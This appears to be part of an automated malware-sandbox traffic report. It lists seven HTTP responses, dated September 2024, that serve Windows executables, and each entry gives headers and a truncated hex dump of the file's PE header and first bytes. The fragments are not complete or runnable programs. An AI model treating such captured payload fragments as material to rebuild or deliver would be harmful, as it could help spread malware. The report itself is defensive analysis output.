Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:07 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Sep 2024 22:15:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:10 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:11 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:11 GMTContent-Type: application/octet-streamContent-Length: 73216Last-Modified: Thu, 26 Sep 2024 22:01:15 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5d9ab-11e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b5 0f 16 c8 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 0e 22 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 21 01 00 53 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 74 fc 00 00 44 25 00 00 03 00 02 00 06 00 00 06 80 2c 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 22 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 fe 01 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 a6 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 0c 03 00 70 28 02 00 00 06 02 72 26 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 a6 03 00 70 28 02 00 00 06 28 11 00 00 06 72 d8 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 0a 04 00 70 28 02 00 00 06 2a 72 d8 03 00 70 28 02 00 00 06 2a aa 72 4d 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 4d 06 00 70 28 02 00 00 06 28 52 00 00 0a 6f 53 00 00 0a 28 54 00 00 0a 2a 62 02 3a 0b 00 00 00 72 00 07 00 70 28 02 00 00 06 2a 02 6f 55 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:15:14 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00
